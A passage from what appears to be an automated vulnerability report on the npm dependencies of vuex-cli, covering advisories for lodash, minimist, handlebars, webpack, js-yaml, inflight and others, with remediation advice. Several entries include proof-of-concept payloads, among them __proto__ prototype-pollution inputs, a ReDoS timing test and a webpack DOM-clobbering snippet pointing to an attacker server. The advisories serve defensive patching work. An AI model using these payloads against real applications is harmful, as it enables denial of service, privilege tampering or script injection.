  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade diff to version 3.5.1, 4.0.4, 5.2.2, 8.0.3 or higher.

References

medium severity

Prototype Pollution

  • Vulnerable module: lodash
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 eslint@1.10.3 inquirer@0.11.4 lodash@3.10.1
    Remediation: Open PR to patch lodash@3.10.1.

Overview

lodash is a modern JavaScript utility library delivering modularity, performance, & extras.

Affected versions of this package are vulnerable to Prototype Pollution. The utilities function allow modification of the Object prototype. If an attacker can control part of the structure passed to this function, they could add or modify an existing property.

PoC by Olivier Arteau (HoLyVieR)

var _= require('lodash');
var malicious_payload = '{"__proto__":{"oops":"It works !"}}';

var a = {};
console.log("Before : " + a.oops);
_.merge({}, JSON.parse(malicious_payload));
console.log("After : " + a.oops);

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

  • Unsafe Object recursive merge

  • Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Type Origin Short description
Denial of service (DoS) Client This is the most likely attack.
DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf).
The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service.
For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail.
Remote Code Execution Client Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.
For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code.
Property Injection Client The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.
For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges.

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

  • Application server

  • Web server

  • Web browser

How to prevent

  1. Freeze the prototype— use Object.freeze (Object.prototype).

  2. Require schema validation of JSON input.

  3. Avoid using unsafe recursive merge functions.

  4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

  5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade lodash to version 4.17.5 or higher.

References

medium severity

Prototype Pollution

  • Vulnerable module: lodash.merge
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 eslint@1.10.3 lodash.merge@3.3.2
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 webpack-merge@0.14.1 lodash.merge@3.3.2

Overview

lodash.merge is a Lodash method _.merge exported as a Node.js module.

Affected versions of this package are vulnerable to Prototype Pollution. The utilities function allow modification of the Object prototype. If an attacker can control part of the structure passed to this function, they could add or modify an existing property.

PoC by Olivier Arteau (HoLyVieR)

var _= require('lodash');
var malicious_payload = '{"__proto__":{"oops":"It works !"}}';

var a = {};
console.log("Before : " + a.oops);
_.merge({}, JSON.parse(malicious_payload));
console.log("After : " + a.oops);

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

  • Unsafe Object recursive merge

  • Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Type Origin Short description
Denial of service (DoS) Client This is the most likely attack.
DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf).
The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service.
For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail.
Remote Code Execution Client Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.
For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code.
Property Injection Client The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.
For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges.

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

  • Application server

  • Web server

  • Web browser

How to prevent

  1. Freeze the prototype— use Object.freeze (Object.prototype).

  2. Require schema validation of JSON input.

  3. Avoid using unsafe recursive merge functions.

  4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

  5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade lodash.merge to version 4.6.2 or higher.

References

medium severity
new

Improper Validation of Specified Index, Position, or Offset in Input

  • Vulnerable module: uuid
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 codecov@1.0.1 request@2.88.2 uuid@3.4.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 koa-proxy@0.6.0 co-request@0.2.1 request@2.88.2 uuid@3.4.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 request@2.88.2 uuid@3.4.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 jspm-github@0.14.14 request@2.88.2 uuid@3.4.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 jspm-npm@0.30.5 request@2.88.2 uuid@3.4.0

Overview

uuid is a RFC4122 (v1, v4, and v5) compliant UUID library.

Affected versions of this package are vulnerable to Improper Validation of Specified Index, Position, or Offset in Input due to accepting external output buffers but not rejecting out-of-range writes (small buf or large offset). This inconsistency allows silent partial writes into caller-provided buffers.

PoC

cd /home/StrawHat/uuid
npm ci
npm run build

node --input-type=module -e "
import {v4,v5,v6} from './dist-node/index.js';
const ns='6ba7b810-9dad-11d1-80b4-00c04fd430c8';
for (const [name,fn] of [
  ['v4',()=>v4({},new Uint8Array(8),4)],
  ['v5',()=>v5('x',ns,new Uint8Array(8),4)],
  ['v6',()=>v6({},new Uint8Array(8),4)],
]) {
  try { fn(); console.log(name,'NO_THROW'); }
  catch(e){ console.log(name,'THREW',e.name); }
}"

Remediation

Upgrade uuid to version 11.1.1, 14.0.0 or higher.

References

medium severity

Missing Release of Resource after Effective Lifetime

  • Vulnerable module: inflight
  • Introduced through: fs-extra@0.26.7, vuex-cli-webpack@1.0.15 and others

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli fs-extra@0.26.7 rimraf@2.7.1 glob@7.2.3 inflight@1.0.6
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 rimraf@2.7.1 glob@7.2.3 inflight@1.0.6
  • Introduced through: vuex-cli@sokis/vuex-cli temp@0.8.4 rimraf@2.6.3 glob@7.2.3 inflight@1.0.6
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-cli@6.26.0 glob@7.2.3 inflight@1.0.6
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 eslint@1.10.3 glob@5.0.15 inflight@1.0.6
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 fs-extra@0.30.0 rimraf@2.7.1 glob@7.2.3 inflight@1.0.6
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-mixins@5.4.1 globby@6.1.0 glob@7.2.3 inflight@1.0.6
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 glob@6.0.4 inflight@1.0.6
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 rimraf@2.7.1 glob@7.2.3 inflight@1.0.6
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-url@5.1.2 directory-encoder@0.7.2 fs-extra@0.23.1 rimraf@2.7.1 glob@7.2.3 inflight@1.0.6
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 eslint@1.10.3 file-entry-cache@1.3.1 flat-cache@1.3.4 rimraf@2.6.3 glob@7.2.3 inflight@1.0.6
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 systemjs-builder@0.16.13 glob@7.2.3 inflight@1.0.6
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 traceur@0.0.105 glob@5.0.15 inflight@1.0.6
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 vue@1.0.28 envify@3.4.1 jstransform@11.0.3 commoner@0.10.8 glob@5.0.15 inflight@1.0.6
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 jspm-github@0.14.14 rimraf@2.7.1 glob@7.2.3 inflight@1.0.6
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 jspm-registry@0.4.4 rimraf@2.7.1 glob@7.2.3 inflight@1.0.6
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 jspm-npm@0.30.5 traceur@0.0.105 glob@5.0.15 inflight@1.0.6
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 systemjs-builder@0.16.13 traceur@0.0.105 glob@5.0.15 inflight@1.0.6

Overview

Affected versions of this package are vulnerable to Missing Release of Resource after Effective Lifetime via the makeres function due to improperly deleting keys from the reqs object after execution of callbacks. This behavior causes the keys to remain in the reqs object, which leads to resource exhaustion.

Exploiting this vulnerability results in crashing the node process or in the application crash.

Note: This library is not maintained, and currently, there is no fix for this issue. To overcome this vulnerability, several dependent packages have eliminated the use of this library.

To trigger the memory leak, an attacker would need to have the ability to execute or influence the asynchronous operations that use the inflight module within the application. This typically requires access to the internal workings of the server or application, which is not commonly exposed to remote users. Therefore, “Attack vector” is marked as “Local”.

PoC

const inflight = require('inflight');

function testInflight() {
  let i = 0;
  function scheduleNext() {
    let key = `key-${i++}`;
    const callback = () => {
    };
    for (let j = 0; j < 1000000; j++) {
      inflight(key, callback);
    }

    setImmediate(scheduleNext);
  }


  if (i % 100 === 0) {
    console.log(process.memoryUsage());
  }

  scheduleNext();
}

testInflight();

Remediation

There is no fixed version for inflight.

References

medium severity

Denial of Service (DoS)

  • Vulnerable module: js-yaml
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-svgo@2.1.6 svgo@0.7.2 js-yaml@3.7.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-svgo@2.1.6 svgo@0.7.2 js-yaml@3.7.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 eslint@1.10.3 js-yaml@3.4.5

Overview

js-yaml is a human-friendly data serialization language.

Affected versions of this package are vulnerable to Denial of Service (DoS). The parsing of a specially crafted YAML file may exhaust the system resources.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade js-yaml to version 3.13.0 or higher.

References

medium severity

Cross-site Scripting (XSS)

  • Vulnerable module: webpack
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 webpack@1.15.0

Overview

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via DOM clobbering in the AutoPublicPathRuntimeModule class. Non-script HTML elements with unsanitized attributes such as name and id can be leveraged to execute code in the victim's browser. An attacker who can control such elements on a page that includes Webpack-generated files, can cause subsequent scripts to be loaded from a malicious domain.

PoC

<!DOCTYPE html>
<html>
<head>
  <title>Webpack Example</title>
  <!-- Attacker-controlled Script-less HTML Element starts--!>
  <img name="currentScript" src="https://attacker.controlled.server/"></img>
  <!-- Attacker-controlled Script-less HTML Element ends--!>
</head>
<script src="./dist/webpack-gadgets.bundle.js"></script>
<body>
</body>
</html>

Details

Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.

This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.

Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.

Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, < can be coded as &lt; and > can be coded as &gt; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses < and > as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.

The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.

Types of attacks

There are a few methods by which XSS can be manipulated:

Type Origin Description
Stored Server The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.
Reflected Server The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.
DOM-based Client The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.
Mutated The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.

Affected environments

The following environments are susceptible to an XSS attack:

  • Web servers
  • Application servers
  • Web application environments

How to prevent

This section describes the top best practices designed to specifically protect your code:

  • Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
  • Convert special characters such as ?, &, /, <, > and spaces to their respective HTML or URL encoded equivalents.
  • Give users the option to disable client-side scripts.
  • Redirect invalid requests.
  • Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
  • Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
  • Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.

Remediation

Upgrade webpack to version 5.94.0 or higher.

References

medium severity

Prototype Pollution

  • Vulnerable module: handlebars
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-url@5.1.2 directory-encoder@0.7.2 handlebars@1.3.0

Overview

handlebars is an extension to the Mustache templating language.

Affected versions of this package are vulnerable to Prototype Pollution when selecting certain compiling options to compile templates coming from an untrusted source.

POC

<script src="https://cdn.jsdelivr.net/npm/handlebars@latest/dist/handlebars.js"></script> 
<script> 
// compile the template 

var s2 = `{{'a/.") || alert("Vulnerable Handlebars JS when compiling in compat mode'}}`; 
var template = Handlebars.compile(s2, { 
compat: true 
}); 
// execute the compiled template and print the output to the console console.log(template({})); 
</script>

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

  • Unsafe Object recursive merge

  • Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Type Origin Short description
Denial of service (DoS) Client This is the most likely attack.
DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf).
The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service.
For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail.
Remote Code Execution Client Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.
For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code.
Property Injection Client The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.
For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges.

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

  • Application server

  • Web server

  • Web browser

How to prevent

  1. Freeze the prototype— use Object.freeze (Object.prototype).

  2. Require schema validation of JSON input.

  3. Avoid using unsafe recursive merge functions.

  4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

  5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade handlebars to version 4.7.7 or higher.

References

medium severity

Prototype Pollution

  • Vulnerable module: minimist
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 mocha@2.5.3 mkdirp@0.5.1 minimist@0.0.8
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 webpack@1.15.0 optimist@0.6.1 minimist@0.0.10

Overview

minimist is a parse argument options module.

Affected versions of this package are vulnerable to Prototype Pollution. The library could be tricked into adding or modifying properties of Object.prototype using a constructor or __proto__ payload.

PoC by Snyk

require('minimist')('--__proto__.injected0 value0'.split(' '));
console.log(({}).injected0 === 'value0'); // true

require('minimist')('--constructor.prototype.injected1 value1'.split(' '));
console.log(({}).injected1 === 'value1'); // true

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

  • Unsafe Object recursive merge

  • Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Type Origin Short description
Denial of service (DoS) Client This is the most likely attack.
DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf).
The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service.
For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail.
Remote Code Execution Client Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.
For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code.
Property Injection Client The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.
For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges.

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

  • Application server

  • Web server

  • Web browser

How to prevent

  1. Freeze the prototype— use Object.freeze (Object.prototype).

  2. Require schema validation of JSON input.

  3. Avoid using unsafe recursive merge functions.

  4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

  5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade minimist to version 0.2.1, 1.2.3 or higher.

References

medium severity

Prototype Pollution

  • Vulnerable module: yargs-parser
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 yargs@4.8.1 yargs-parser@2.4.1

Overview

yargs-parser is a mighty option parser used by yargs.

Affected versions of this package are vulnerable to Prototype Pollution. The library could be tricked into adding or modifying properties of Object.prototype using a __proto__ payload.

